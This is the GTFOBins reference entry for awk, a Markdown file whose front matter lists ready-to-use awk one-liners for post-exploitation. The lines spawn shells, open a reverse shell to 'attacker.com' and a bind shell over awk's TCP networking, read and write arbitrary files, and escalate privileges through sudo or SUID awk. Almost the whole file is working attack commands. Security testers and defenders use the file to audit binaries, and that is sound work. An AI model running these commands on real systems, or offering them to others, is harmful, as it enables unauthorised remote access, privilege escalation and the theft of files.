GTFOBins.github.io/_gtfobins/awk.md
2021-01-18 09:44:34 +02:00

39 lines
1.2 KiB
Markdown

---
functions:
shell:
- code: awk 'BEGIN {system("/bin/sh")}'
non-interactive-reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
RHOST=attacker.com
RPORT=12345
awk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN {
s = "/inet/tcp/0/" RHOST "/" RPORT;
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
non-interactive-bind-shell:
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
code: |
LPORT=12345
awk -v LPORT=$LPORT 'BEGIN {
s = "/inet/tcp/" LPORT "/0/0";
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
file-write:
- code: |
LFILE=file_to_write
awk -v LFILE=$LFILE 'BEGIN { print "DATA" > LFILE }'
file-read:
- code: |
LFILE=file_to_read
awk '//' "$LFILE"
suid:
- code: |
LFILE=file_to_read
./awk '//' "$LFILE"
sudo:
- code: sudo awk 'BEGIN {system("/bin/sh")}'
limited-suid:
- code: ./awk 'BEGIN {system("/bin/sh")}'
---